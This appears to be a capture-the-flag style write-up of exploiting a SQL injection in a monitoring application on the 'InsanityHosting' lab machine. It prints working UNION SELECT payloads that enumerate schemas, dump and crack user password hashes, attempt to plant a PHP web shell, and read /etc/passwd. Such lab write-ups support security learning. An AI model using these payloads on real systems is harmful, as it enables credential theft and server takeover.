SQL Injection
A SQL injection vulnerability has been identified to be present in the Name field of the target MONITORING CONTROL application.
The backend appears to fetch the value of the Name field without any form of sanitization, and then the SQL query gets executed. This process is being iterated every minute.
Given the time-consuming nature of the process suspected above, avoiding the complete enumeration is advised. Thus, prioritizing exfiltrating key-data and code execution.
/Play/InsanityHosting/3-Exploitation/attachments/{C2F9E3C3-47A5-4F2D-BDB9-31B0CF1391E2}.png)
4 columns are shown. This suggests that there are at least 4 columns.
/Play/InsanityHosting/3-Exploitation/attachments/{A24A632C-33A8-4ED0-B4E5-18116C244A1B}.png)
/Play/InsanityHosting/3-Exploitation/attachments/{0BE0D834-832E-401C-8F6F-2AF551C9D318}.png)
" UNION SELECT 1,2,3,4 -- - There are 4 columns
Databases
/Play/InsanityHosting/3-Exploitation/attachments/{FD8A1EF4-D8B7-4633-929E-CC6F04435051}.png)
/Play/InsanityHosting/3-Exploitation/attachments/{125C183F-D5AF-4586-91E6-42EFF91B10B2}.png)
" UNION SELECT schema_name,2,3,4 information_schema.schemata -- - information_schemamonitoringmysqlperformance_schema
monitoring DB
/Play/InsanityHosting/3-Exploitation/attachments/{9A06696C-EC35-4AE5-8DCD-02A0628AD458}.png)
/Play/InsanityHosting/3-Exploitation/attachments/{33FF0318-CAF3-4B3F-9DDF-FE8D9283827F}.png)
" UNION SELECT table_name,2,3,4 FROM information_schema.tables WHERE table_schema="monitoring" -- - monitoring.users table
monitoring.users table
/Play/InsanityHosting/3-Exploitation/attachments/{7350C928-D28F-48DD-AEA8-FB1815C4AAA4}.png)
/Play/InsanityHosting/3-Exploitation/attachments/{3C92C354-A610-44F9-B48E-7504E6B8D441}.png)
" UNION SELECT column_name,2,3,4 FROM information_schema.columns WHERE table_schema="monitoring" AND table_name="users"-- - monitoring.users.usernamemonitoring.users.password
monitoring.users Table Credential Exfiltration
/Play/InsanityHosting/3-Exploitation/attachments/{E7ECBB20-C9F4-448A-9728-6A0ED731DC61}.png)
/Play/InsanityHosting/3-Exploitation/attachments/{6A03BD93-BC43-457F-B03C-F1CF75C70BA2}.png)
" UNION SELECT username,password,3,4 FROM monitoring.users -- - admin:$2y$12$huPSQmbcMvgHDkWIMnk9t.1cLoBWue3dtHf9E5cKUNcfKTOOp8cmanicholas:$2y$12$4R6JiYMbJ7NKnuQEoQW4ruIcuRJtDRukH.Tvx52RkUfx5eloIw7Qeotis:$2y$12$./XCeHl0/TCPW5zN/E9w0ecUUKbDomwjQ0yZqGz5tgASgZg6SIHFW
Those are bcrypt hash, often used in UNIX.
However, hashcat was unable to crack them, except for the known password of the otis user; 123456
mysql.user Table Credential Exfiltration
/Play/InsanityHosting/3-Exploitation/attachments/{CE412A97-BAA5-404F-9335-F7826A68B41B}.png)
/Play/InsanityHosting/3-Exploitation/attachments/{9CBDF450-2CF3-4777-A2CA-EA922B2DE240}.png)
" UNION SELECT user,password,authentication_string,4 FROM mysql.user-- -root:CDA244FF510B063DA17DFF84FF39BA0849F7920F- Password of the
rootuser cannot be cracked.
- Password of the
elliot::5A5749F309CAC33B27BA94EE02168FA3C3E7A3E9- The
elliotuser does not have password. - The other string is from the
authentication_stringcolumn
- The
Password Cracking
/Play/InsanityHosting/3-Exploitation/attachments/{A3F0297F-6CC7-4560-AD2D-2559154004C8}.png)
Password hash cracked for the elliot user; elliot123
Validating it against the target SSH server.
phpMyAdmin
/Play/InsanityHosting/3-Exploitation/attachments/{9B5EB9EB-8B37-414A-9399-E7116AE54BF0}.png)
Since the password column is empty, I should be able to authenticate to the target phpMyAdmin instance using only the username; elliot
/Play/InsanityHosting/3-Exploitation/attachments/{BBAFF9C3-EE4E-4A69-A5E1-C58B4D049AC8}.png)
Successfully authenticated as the elliot user.
Unfortunately, nothing can be done from here due to lack of privileges.
File Write
/Play/InsanityHosting/3-Exploitation/attachments/{09F9410F-212D-4451-B755-2D6E29A50F6A}.png)
" UNION SELECT "<?php system($_GET['cmd']); ?>",2,3,4 INTO OUTFILE "/var/www/html/webshell.php" -- -/Play/InsanityHosting/3-Exploitation/attachments/{702714E3-96CE-4544-A41B-3F0F17A27CC9}.png)
" UNION SELECT '<?php system($_GET["cmd"]); ?>',2,3,4 INTO OUTFILE '/var/www/html/webshell.php' -- -/Play/InsanityHosting/3-Exploitation/attachments/{0D3E4C5B-64A9-4423-94BD-24B931B897D2}.png)
File write seems impossible.
File Read
/Play/InsanityHosting/3-Exploitation/attachments/{7D6FE818-C80F-4F64-9FFA-69D6FABFE5AB}.png)
/Play/InsanityHosting/3-Exploitation/attachments/{2361FC6F-280C-49C9-BC5E-C596005F9904}.png)
" UNION SELECT LOAD_FILE('/etc/passwd'),2,3,4 -- -file read is possible
Based on the /etc/passwd file, all the exfiltrated users above are valid system users.